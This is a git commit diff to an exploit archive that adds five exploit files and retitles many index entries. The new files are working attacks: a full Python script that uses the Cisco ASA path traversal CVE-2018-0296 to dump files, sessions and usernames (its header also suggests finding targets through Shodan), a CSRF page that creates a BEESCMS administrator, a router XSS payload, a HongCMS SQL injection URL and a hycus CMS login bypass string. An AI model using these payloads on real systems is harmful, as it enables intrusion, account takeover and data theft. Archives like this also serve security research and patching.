DB: 2018-06-29
5 changes to exploits/shellcodes Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit) Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC) Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One Novell Groupwise 8.0 - 'RCPT' Off-by-One WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities Sysax Multi Server < 5.25 (SFTP Module) - Multiple Denial of Service Vulnerabilities Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution Novell Groupwise Internet Agent - IMAP 'LIST LSUB' Remote Code Execution Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities Solar FTP Server 2.0 - Multiple Denial of Service Vulnerabilities LiteServe 2.81 - PASV Command Denial of Service LiteServe 2.81 - 'PASV' Denial of Service Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC) Notepad++ NppFTP Plugin - 'LIST' Remote Heap Overflow (PoC) TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities TYPSoft FTP Server 1.10 - Multiple Denial of Service Vulnerabilities WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service WFTPD 2.4.1RC11 - MLST Command Remote Denial of Service WFTPD 2.4.1RC11 - 'MLST' Remote Denial of Service Oracle 8i - dbsnmp Command Remote Denial of Service Oracle 8i - 'dbsnmp' Remote Denial of Service Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow Mollensoft Software Enceladus Server Suite 3.9 - 'FTP' Buffer Overflow GuildFTPd 0.999.8 - CWD Command Denial of Service GuildFTPd 0.999.8 - 'CWD' Denial of Service Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow RobotFTP Server 1.0/2.0 - Remote Command Denial of Service RobotFTP Server 1.0/2.0 - Remote Denial of Service RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (3) Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution Opera Web Browser 7.54 - 'KDE KFMCLIENT' Remote Command Execution MailEnable 1.x - SMTP HELO Command Remote Denial of Service MailEnable 1.x - SMTP 'HELO' Remote Denial of Service HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow HP JetDirect FTP Print Server - RERT Command Denial of Service HP JetDirect FTP Print Server - 'RERT' Denial of Service FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service Ability FTP Server 2.1.4 - 'afsmain.exe' 'USER' Remote Denial of Service Ability FTP Server 2.1.4 - Admin Panel 'AUTHCODE' Remote Denial of Service Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution Resolv+ 'RESOLV_HOST_CONF' - Linux Library Command Execution Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution Platform Load Sharing Facility 4/5 - 'LSF_ENVDIR' Local Command Execution Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Execution Golden FTP Server 4.70 - PASS Command Buffer Overflow Golden FTP Server 4.70 - 'PASS' Buffer Overflow EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'MKD' Stack Buffer Overflow (Metasploit) Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit) Vermillion FTP Daemon - 'PORT' Memory Corruption (Metasploit) EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit) Zabbix Agent - net.tcp.listen Command Injection (Metasploit) Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit) Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit) Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (1) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (2) Majordomo 1.89/1.90 - lists Command Execution Majordomo 1.89/1.90 - 'lists' Command Execution PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution PALS Library System WebPALS 1.0 - 'pals-cgi' Arbitrary Command Execution SGI IRIX 6.x - rpc.xfsmd Remote Command Execution SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure HP-UX FTPD 1.1.214.4 - 'REST' Memory Disclosure Sami FTP Server 2.0.1 - LIST Command Buffer Overflow Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow Sami FTP Server - LIST Command Buffer Overflow (Metasploit) Sami FTP Server - 'LIST' Buffer Overflow (Metasploit) PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit) PineApp Mail-SeCure - 'livelog.html' Arbitrary Command Execution (Metasploit) FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow HP Data Protector - EXEC_BAR Remote Command Execution HP Data Protector - 'EXEC_BAR' Remote Command Execution IPtools 0.1.4 - Remote Command Server Buffer Overflow IPtools 0.1.4 - Remote Buffer Overflow TWiki 20030201 - search.pm Remote Command Execution TWiki 20030201 - 'search.pm' Remote Command Execution AWStats 6.0 < 6.2 - configdir Remote Command Execution (C) AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl) Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution Guppy 4.5.9 - 'REMOTE_ADDR' Remote Command Execution SimpleBBS 1.1 - Remote Commands Execution SimpleBBS 1.1 - Remote Command Execution SimpleBBS 1.1 - Remote Commands Execution (C) SimpleBBS 1.1 - Remote Command Execution (C) Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command phpDocumentor 1.3.0 rc4 - Remote Commands Execution phpBB 2.0.17 - 'signature_bbcode_uid' Remot Command phpDocumentor 1.3.0 rc4 - Remote Command Execution CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution SPIP 1.8.2g - Remote Commands Execution CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution SPIP 1.8.2g - Remote Command Execution DocMGR 0.54.2 - 'file_exists' Remote Commands Execution DocMGR 0.54.2 - 'file_exists' Remote Command Execution EnterpriseGS 1.0 rc4 - Remote Commands Execution FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution EnterpriseGS 1.0 rc4 - Remote Command Execution FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution PHPKIT 1.6.1R2 - 'filecheck' Remote Command Execution Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Coppermine Photo Gallery 1.4.3 - Remote Command Execution GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution GeekLog 1.x - 'error.log' Remote Command Execution PHP-Stats 0.1.9.1 - Remote Commands Execution PHP-Stats 0.1.9.1 - Remote Commans Execution Gallery 2.0.3 - stepOrder[] Remote Commands Execution Gallery 2.0.3 - 'stepOrder[]' Remote Command Execution phpList 2.10.2 - GLOBALS[] Remote Code Execution phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution Simplog 0.9.2 - 's' Remote Commands Execution Simplog 0.9.2 - 's' Remote Command Execution phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution phpWebSite 0.10.2 - 'hub_dir' Remote Command Execution phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution GuppY 4.5.16 - Remote Commands Execution GuppY 4.5.16 - Remote Command Execution AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit) AWStats 6.1 < 6.2 - 'configdir' Remote Command Execution (Metasploit) Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution Achievo 0.7/0.8/0.9 - Remote File Inclusion / Command Execution SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution SiteInteractive Subscribe Me - 'Setup.pl' Arbitrary Command Execution BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin) HongCMS 3.0.0 - SQL Injection hycus CMS 1.0.4 - Authentication Bypass DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting Cisco Adaptive Security Appliance - Path Traversal
This commit is contained in:
parent
641d6cca75
commit
fdf8bfe785
6 changed files with 269 additions and 82 deletions
18
exploits/hardware/webapps/44955.txt
Normal file
18
exploits/hardware/webapps/44955.txt
Normal file
|
@ -0,0 +1,18 @@
|
|||
# Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
|
||||
# Date: 2018-06-25
|
||||
# Vendor Homepage: http://www.digisol.com
|
||||
# Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
|
||||
# Category: Hardware
|
||||
# Exploit Author: Adipta Basu
|
||||
# Tested on: Mac OS High Sierra
|
||||
# CVE: N/A
|
||||
|
||||
# Reproduction Steps:
|
||||
|
||||
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
|
||||
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
|
||||
- Open BurpSuite
|
||||
- Change the SSID to "Testing" and hit "Apply"
|
||||
- Burp will capture the intercepts.
|
||||
- Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is
|
||||
- Refresh the page, and you will get the "ADIPTA" pop-up
|
107
exploits/hardware/webapps/44956.py
Executable file
107
exploits/hardware/webapps/44956.py
Executable file
|
@ -0,0 +1,107 @@
|
|||
'''
|
||||
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
|
||||
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
|
||||
|
||||
Vulnerable Products
|
||||
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
|
||||
|
||||
3000 Series Industrial Security Appliance (ISA)
|
||||
ASA 1000V Cloud Firewall
|
||||
ASA 5500 Series Adaptive Security Appliances
|
||||
ASA 5500-X Series Next-Generation Firewalls
|
||||
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
|
||||
Adaptive Security Virtual Appliance (ASAv)
|
||||
Firepower 2100 Series Security Appliance
|
||||
Firepower 4100 Series Security Appliance
|
||||
Firepower 9300 ASA Security Module
|
||||
FTD Virtual (FTDv)
|
||||
Script usage
|
||||
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
|
||||
Usage: python cisco_asa.py <URL>
|
||||
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.
|
||||
|
||||
Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.
|
||||
|
||||
Bug Bounty Recon
|
||||
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)
|
||||
|
||||
References:
|
||||
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
|
||||
'''
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
import requests
|
||||
import sys
|
||||
import urlparse
|
||||
import os
|
||||
import re
|
||||
|
||||
print("""
|
||||
_____ _____ _____ _____ _____ ___ _____ ___
|
||||
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
|
||||
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
|
||||
| | | | `--. \ | | | | | | _ | `--. \ _ |
|
||||
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
|
||||
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
|
||||
|
||||
______ _ _ _____ _
|
||||
| ___ \ | | | | |_ _| | |
|
||||
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
|
||||
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
|
||||
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
|
||||
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
|
||||
|
||||
CVE-2018-0296
|
||||
Script author: Yassine Aboukir(@yassineaboukir)
|
||||
""")
|
||||
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
|
||||
url = sys.argv[1]
|
||||
|
||||
regexSess = r"([0-9])\w+'"
|
||||
regexUser = r"(user:)\w+"
|
||||
|
||||
dir_path = os.path.dirname(os.path.realpath(__file__))
|
||||
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
|
||||
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
|
||||
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
|
||||
logon = "/+CSCOE+/logon.html"
|
||||
|
||||
try:
|
||||
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(e)
|
||||
sys.exit(1)
|
||||
|
||||
if "webvpnLang" in is_cisco_asa.cookies:
|
||||
try:
|
||||
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
|
||||
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
|
||||
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
|
||||
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(e)
|
||||
sys.exit(1)
|
||||
|
||||
if str(filelist_r.status_code) == "200":
|
||||
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
|
||||
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
|
||||
|
||||
''' Extraccion de usuarios'''
|
||||
matches_sess = re.finditer(regexSess, active_sessions_r.text)
|
||||
for match_sess in matches_sess:
|
||||
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+str(match_sess.group().strip("'"))), verify=False)
|
||||
matches_user = re.finditer(regexUser, active_users_r.text)
|
||||
|
||||
for match_user in matches_user:
|
||||
cisco_dump.write(match_user.group()+"\n")
|
||||
''' Fin Extraccion de usuarios'''
|
||||
|
||||
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
|
||||
else: print("Not vulnerable!")
|
||||
|
||||
else:
|
||||
print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
|
||||
sys.exit(1)
|
31
exploits/php/webapps/44952.html
Normal file
31
exploits/php/webapps/44952.html
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
|
||||
# Date: 2018-06-25
|
||||
# Exploit Author: bay0net
|
||||
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9226389.html
|
||||
# Software Link: http://www.beescms.com/
|
||||
# Version: BEESCMS - V4.0
|
||||
# CVE : CVE-2018-12739
|
||||
|
||||
A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
|
||||
|
||||
The payload for attack is as follows.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://10.211.55.17/beescms/admin/admin_admin.php?nav=list_admin_user&admin_p_nav=user" method="POST" enctype="multipart/form-data">
|
||||
<input type="hidden" name="admin_name" value="test1" />
|
||||
<input type="hidden" name="admin_password" value="test1" />
|
||||
<input type="hidden" name="admin_password2" value="test1" />
|
||||
<input type="hidden" name="admin_nich" value="test1" />
|
||||
<input type="hidden" name="purview" value="1" />
|
||||
<input type="hidden" name="admin_admin" value="" />
|
||||
<input type="hidden" name="admin_mail" value="" />
|
||||
<input type="hidden" name="admin_tel" value="" />
|
||||
<input type="hidden" name="is_disable" value="0" />
|
||||
<input type="hidden" name="action" value="save_admin" />
|
||||
<input type="hidden" name="submit" value="确定" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
13
exploits/php/webapps/44953.txt
Normal file
13
exploits/php/webapps/44953.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: HongCMS 3.0.0 - SQL Injection
|
||||
# Google Dork: [if applicable]
|
||||
# Date: 2018/06/26
|
||||
# Exploit Author: Hzllaga
|
||||
# Vendor Homepage: https://github.com/Neeke/HongCMS/
|
||||
# Software Link: https://github.com/Neeke/HongCMS/
|
||||
# Version: 3.0.0
|
||||
# Tested on: php5.4 mysql5
|
||||
# CVE : CVE-2018-12912
|
||||
|
||||
POC (Administrator Privilege):
|
||||
|
||||
/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60
|
13
exploits/php/webapps/44954.txt
Normal file
13
exploits/php/webapps/44954.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
|
||||
# Google Dork:N/A
|
||||
# Date: 28.06.2018
|
||||
# Exploit Author: Berk Dusunur
|
||||
# Vendor Homepage: http://www.hycus.com/
|
||||
# Software Link: http://demosite.center/hycus/
|
||||
# Version: 1.0.4
|
||||
# Tested on: Pardus / Debian Web Server
|
||||
# CVE : N/A
|
||||
|
||||
#Proof Of Concept
|
||||
|
||||
use login bypass payload for username= '=' 'OR' for password= '=' 'OR'
|
|
@ -791,7 +791,7 @@ id,file,description,date,author,type,platform,port
|
|||
6434,exploits/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,dos,windows,
|
||||
6458,exploits/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,dos,windows,
|
||||
6459,exploits/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,dos,hardware,
|
||||
6463,exploits/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",dos,windows,
|
||||
6463,exploits/windows/dos/6463.rb,"Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",dos,windows,
|
||||
6471,exploits/multiple/dos/6471.pl,"Apple QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,dos,multiple,
|
||||
6472,exploits/multiple/dos/6472.c,"Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",dos,multiple,
|
||||
6474,exploits/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",dos,windows,
|
||||
|
@ -838,9 +838,9 @@ id,file,description,date,author,type,platform,port
|
|||
6756,exploits/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",dos,windows,
|
||||
6761,exploits/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",dos,windows,
|
||||
6775,exploits/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",dos,solaris,
|
||||
6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
|
||||
6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
|
||||
6805,exploits/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",dos,multiple,
|
||||
6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
|
||||
6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows,
|
||||
6815,exploits/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",dos,windows,
|
||||
6824,exploits/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",dos,windows,
|
||||
6832,exploits/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,dos,windows,
|
||||
|
@ -936,7 +936,7 @@ id,file,description,date,author,type,platform,port
|
|||
7942,exploits/windows/dos/7942.pl,"Elecard AVC HD player - '.m3u' / '.xpl' Local Stack Overflow (PoC)",2009-02-02,AlpHaNiX,dos,windows,
|
||||
7943,exploits/windows/dos/7943.py,"RealVNC 4.1.2 - 'vncviewer.exe' RFB Protocol Remote Code Execution (PoC)",2009-02-02,"Andres Luksenberg",dos,windows,
|
||||
7962,exploits/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,dos,windows,
|
||||
7985,exploits/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One",2009-02-04,"Praveen Darshanam",dos,windows,
|
||||
7985,exploits/windows/dos/7985.pl,"Novell Groupwise 8.0 - 'RCPT' Off-by-One",2009-02-04,"Praveen Darshanam",dos,windows,
|
||||
7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",dos,windows,
|
||||
7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",dos,windows,
|
||||
7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",dos,windows,
|
||||
|
@ -1193,7 +1193,7 @@ id,file,description,date,author,type,platform,port
|
|||
9617,exploits/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",dos,windows,
|
||||
9620,exploits/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,dos,windows,
|
||||
9621,exploits/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Denial of Service",2009-09-10,"Usman Saeed",dos,windows,
|
||||
9622,exploits/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service",2009-09-10,corelanc0d3r,dos,windows,
|
||||
9622,exploits/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service",2009-09-10,corelanc0d3r,dos,windows,
|
||||
9626,exploits/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,dos,windows,
|
||||
9642,exploits/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",dos,multiple,1812
|
||||
9646,exploits/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,dos,hardware,
|
||||
|
@ -1603,7 +1603,7 @@ id,file,description,date,author,type,platform,port
|
|||
13921,exploits/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",dos,windows,
|
||||
13934,exploits/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,dos,windows,
|
||||
13939,exploits/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,dos,windows,
|
||||
13958,exploits/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,dos,windows,
|
||||
13958,exploits/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Denial of Service Vulnerabilities",2010-06-21,leinakesi,dos,windows,
|
||||
13959,exploits/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",dos,windows,9987
|
||||
13965,exploits/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)",2010-06-22,blake,dos,windows,
|
||||
14003,exploits/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Denial of Service",2010-06-23,"Patroklos Argyroudis",dos,freebsd,
|
||||
|
@ -1802,8 +1802,8 @@ id,file,description,date,author,type,platform,port
|
|||
15494,exploits/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,dos,windows,
|
||||
15495,exploits/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,dos,windows,
|
||||
15458,exploits/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,dos,windows,
|
||||
15463,exploits/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
|
||||
15464,exploits/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
|
||||
15463,exploits/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
|
||||
15464,exploits/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP 'LIST LSUB' Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux,
|
||||
